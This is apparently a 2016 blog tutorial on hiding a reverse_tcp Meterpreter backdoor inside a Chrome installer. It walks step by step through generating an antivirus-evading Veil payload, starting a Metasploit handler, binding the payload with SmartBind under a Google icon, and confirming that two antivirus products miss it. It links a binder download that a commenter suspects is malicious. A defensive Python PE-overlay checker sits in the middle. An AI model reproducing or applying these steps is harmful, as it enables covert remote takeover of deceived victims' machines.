Windows Hacking 1: Injecting a Backdoor into a PE File

June 20, 2016


Welcome back Cybrarians,

In the hacking world, being stealthy and undetectable is the number one priority after anonymity. Crafting a custom attack that looks convincing is an art that takes creativity and patience. Luring a user into the attacker's trap is not as easy as it was in the old days, so new techniques are needed to take care of every detail that makes the lure believable.

Today's tutorial covers how to create an innocuous-looking backdoor and bind it to a legitimate executable so that it inherits the victim's trust in that program. We'll use a reverse_tcp Meterpreter stager as our payload and the Chrome setup program as the legitimate executable.

Note: Everything you learn here, now or in the future, is for educational purposes only. Use these tutorials at your own discretion.

Terminology:

Before we start with the tutorial, we need a basic understanding of the terms used in the process:

1- Exploit: code or a technique that takes advantage of a weakness (vulnerability) in a system to gain unauthorized access to it.

2- Vulnerability: a weakness or flaw that gives an attacker the ability to compromise a system and control it. Vulnerabilities include software bugs, operating system flaws, and misconfigurations of programs, applications or devices.

3- Metasploit: a framework containing a collection of tools (exploits, payloads, handlers and post-exploitation modules) that make exploitation and penetration testing easier and more efficient.

4- Veil-Evasion: a well-known framework that generates payloads compatible with Metasploit handlers in several languages (Python, C, PowerShell and others), encrypting or obfuscating them so they are harder for anti-virus products to detect. Evasion is never guaranteed: a sample that is clean today can be flagged once vendors have seen it.

5- Shell: an interface used to interact with a machine by executing the commands a user enters.

6- Reverse_tcp shell: inbound connections from the outside world (the internet) to a victim's machine are normally blocked by network firewalls, NAT or filtered ports. A reverse shell therefore has the victim's machine initiate an outbound TCP connection back to a listener on the attacker's machine, which most perimeter filtering allows.

7- PE (Portable Executable): the file format Windows uses for executables, DLLs and drivers.

PE file extensions include: .exe, .dll, .sys, .ocx, .cpl.

In this tutorial, we will be using an .exe file. Now that the terminology is covered, let's begin.

 

Tutorial Requirements:

1- Veil Evasion: https://github.com/Veil-Framework/Veil-Evasion

2- Metasploit on Kali Linux

3- Windows Machine to emulate the victim

4- SmartBind –>> a tool that binds the payload with the real program. I uploaded it to Filedropper, but you can also Google it: http://www.filedropper.com/smartbinderv20_1

 

Tutorial Guidelines:

Step 1: Generate Veil Evasion Payload

Note: this step requires installing Veil Evasion first.

  • Start the tool from the Veil-Evasion directory by typing:

        >>>> ./Veil-Evasion.py

v1.JPG

We can see that this version of Veil-Evasion has added more modules; there are now 50 payloads to choose from.

The tool is very simple to use; we'll start by listing all the available payloads by typing:

>>>> list

v2.JPG

We're going to select number 34, which in this version is the reverse_tcp payload. The numbers shift between Veil releases, so read the number from your own list output rather than copying 34 blindly.

  • After choosing our payload type, we set the local host and local port:

v3.JPG

  • Set USE_PYHERION to Y for yes. Pyherion is Veil's Python crypter: it encrypts the payload source and decrypts it in memory at run time, which defeats simple signature matching.

  • Set LHOST to the IP address the victim will connect back to; in a lab this is your Kali machine's internal IP.

  • Set LPORT as your local port or leave it as the default.

v4.JPG

  • Type generate to create the payload

v5.JPG

  • Type the name of the output file and hit enter.

Note: choose a name that closely resembles the real program's name.

v6.JPG

  • Choose number 2, Pwnstaller, to compile with an obfuscated PyInstaller loader for extra evasion, and hit enter. Encryption alone is sometimes not enough; obfuscating the loader as well helps get the intended result.

  • After you hit enter, the payload is created and saved under /usr/share/veil-output/compiled/nameOfFile.exe. Veil also writes a matching Metasploit resource (.rc) file under /usr/share/veil-output/handlers/, which can be loaded with msfconsole -r to start the handler from Step 2 with the same LHOST and LPORT.

v7.JPG


Step 2: Starting a Handler with Metasploit

Now that our payload is ready, we set up a handler so the connection coming back from the victim is caught by our machine.

Note: a handler is the listener on the attacker's machine that waits for the payload to connect back, either on the local network or over the internet, and then drives the resulting session.

  • First, start Metasploit by typing:

>>>> msfconsole

  • Create the handler, by typing:

       >>>>> use exploit/multi/handler

v8.JPG

  • Set the payload type:

          >>>>  set PAYLOAD windows/meterpreter/reverse_tcp

v9.JPG

  • Set LHOST and LPORT to the same values you used in the payload:

Note: The listening IP and port must match the LHOST and LPORT baked into the payload. A handler on a different IP or port will simply never receive the connection.


v10.JPG

v11.JPG

  • After setting everything up, type exploit to start listening. The -j flag runs the handler as a background job so the console stays usable:

           >>>> exploit -j

v12.JPG


Step 3 : Bind the payload with an Executable File:

This step is important for creating a legitimate-looking backdoor: one that not only evades anti-virus detection but also looks like the real program to the user.

We're going to use a program known as SmartBind. It binds your payload with a legitimate executable and lets you change the icon to match the real program.

When you generate a Veil-Evasion payload and drop it on a Windows machine, the executable looks suspicious and untrustworthy. See the image below:

1 (1).PNG

Plus, when you double-click it, Windows SmartScreen warns that the application is unrecognized and might put the PC at risk. As a result, the user may not run it, and the mission fails.

Note: SmartScreen flags the file because it carries no trusted Authenticode signature and has no established download reputation. The check only runs on files that carry the mark-of-the-web (the Zone.Identifier alternate data stream Windows attaches to files downloaded from the internet), so how the file reaches the victim also affects whether the prompt appears at all.

8.PNG

In this test, binding the payload with a legitimate application got past this screen. Instead, you get a UAC (User Account Control) prompt, the regular notification when a program asks for administrator rights. Keep in mind that the UAC dialog for an unsigned file still shows an unknown publisher, so an alert user may notice the difference from the real installer.

9.PNG

Note: This program (SmartBind) may alert your antivirus. Therefore, use it on your virtual machine.

3.PNG

  • Choose the icon that resembles the real program. In this case, we are using the Google icon.

  • Click Add Files to add your payload.

  • Click Add Files again to add the real executable program.

Once both are added, click Save Output File and save it where you want. Then click Bind Files.

4.PNG

As you can see, the result looks entirely unsuspicious.

Step 4: Scanning Time

Now that the application is ready, it's time to scan it and check whether anti-virus detects it.

I used two anti-viruses for scanning: Kaspersky and Norton.

6 (1).PNG


VirtualBox_window10 Clone_15_06_2016_12_18_13.png

As you can see, both anti-virus products reported the file as clean. Treat that as a snapshot rather than a guarantee: detection depends on the vendor's current signatures and heuristics, and a file that is clean today can be flagged tomorrow. A clean scan also says nothing about what the file actually contains; the structure of a bound executable can still give it away.
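The following is an added example for this tutorial, not code from the post, from Veil or from SmartBind. It ties together the PE definition from the Terminology section and Steps 3 and 4: instead of trusting an anti-virus verdict, a reviewer can parse the PE headers of the bound file and ask two structural questions, whether bytes have been appended past the last section (the overlay, where simple append-style binders stash the files they later drop) and whether the file carries an Authenticode certificate table. The sample PE and its fake certificate blob are constructed inline so the code runs offline; a binder that embeds its files as resources or extra sections instead of appending them would need a resource-directory walk, which this example does not do.

```python
"""Static checks on a PE file: appended overlay data and Authenticode signature.

Added example; the PE image built by build_sample_pe() is constructed test data,
not a real binary, and the certificate blob is a stand-in, not a real PKCS#7.
"""
import struct
import sys

IMAGE_DIRECTORY_ENTRY_SECURITY = 4        # certificate table slot in the data directory
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def parse_pe(data: bytes) -> dict:
    """Return overlay and signature facts for an in-memory PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # Data directories start at +96 in a PE32 optional header and +112 in PE32+.
    dir_base = opt + (96 if magic == PE32_MAGIC else 112)
    # For the security directory the "VirtualAddress" field is a raw file offset.
    sig_off, sig_size = struct.unpack_from("<II", data, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)

    sections, end_of_sections = [], 0
    table = opt + opt_size                 # section table follows the optional header
    for i in range(num_sections):
        hdr = table + i * 40               # IMAGE_SECTION_HEADER is 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", data, hdr + 16)
        sections.append((name, ptr_raw, size_raw))
        end_of_sections = max(end_of_sections, ptr_raw + size_raw)

    overlay_size = max(0, len(data) - end_of_sections)
    signed = sig_off != 0 and sig_size != 0
    # A legitimate signature also lives in the overlay; subtract it so that only
    # unexplained trailing bytes (where append-style binders put payloads) remain.
    accounted = sig_size if signed and end_of_sections <= sig_off <= len(data) - sig_size else 0
    return {
        "arch": "PE32+" if magic == PE32PLUS_MAGIC else "PE32",
        "sections": sections,
        "end_of_sections": end_of_sections,
        "signed": signed,
        "overlay_size": overlay_size,
        "unexplained_overlay": overlay_size - accounted,
    }


def build_sample_pe(code: bytes, overlay: bytes = b"", signed: bool = False) -> bytes:
    """Construct a minimal, non-runnable PE32 image (test data) for parse_pe.

    One .text section at file offset 0x200, optional trailing bytes as an
    append-style binder would leave them, and an optional fake WIN_CERTIFICATE
    recorded in the security directory.
    """
    align = 0x200
    raw_size = -(-len(code) // align) * align          # round up to FileAlignment
    end_of_sections = align + raw_size
    cert, sig_off, sig_size = b"", 0, 0
    if signed:
        blob = b"\x30\x82" + b"\xAA" * 30                 # stand-in for a PKCS#7 body
        cert = struct.pack("<IHH", 8 + len(blob), 0x0200, 0x0002) + blob
        sig_off, sig_size = end_of_sections + len(overlay), len(cert)

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                  # PE32 optional header with 16 directories
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, sig_off, sig_size)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, raw_size, align,
                          0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + coff + bytes(opt) + section
    headers += b"\0" * (align - len(headers))
    return headers + code.ljust(raw_size, b"\0") + overlay + cert


if __name__ == "__main__":
    # Inspect a real file if one is given, otherwise the constructed bound sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        image = build_sample_pe(b"\x90" * 100, overlay=b"PAYLOAD" * 100)
    for key, value in parse_pe(image).items():
        print("%-20s %s" % (key, value))
```

Run it against the SmartBind output as well as the original Chrome installer and compare: the genuine installer reports signed and no unexplained overlay, whereas an append-style bound file reports unsigned with a large unexplained overlay, regardless of what the icon or the anti-virus verdict says.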

 

Step 5: Getting a Meterpreter

Once the victim clicks the file, he'll notice nothing: the program opens normally without any problems. Meanwhile the payload executes, and you should see a Meterpreter session open in your handler.

11.JPG

Note: I did not cover how to send the payload. This is part of another series (Social Engineering).


That’s all for today’s tutorial. Thank you for reading and stay tuned for more.

@Z33MAXX

19 Comments
  1. Doesn't exist: http://www.filedropper.com/smartbinderv20_1. Just wondering – the whole PoC looks nice, but considering there are no details on Smart Bind, I would sniff some kind of SE. It is certainly really strange that it is not detectable by Google. Either check the link, drop it to a legitimate location, or this tutorial should be marked as potentially unwanted and will be reported as malicious to the owners.

  2. Nice Tutorial
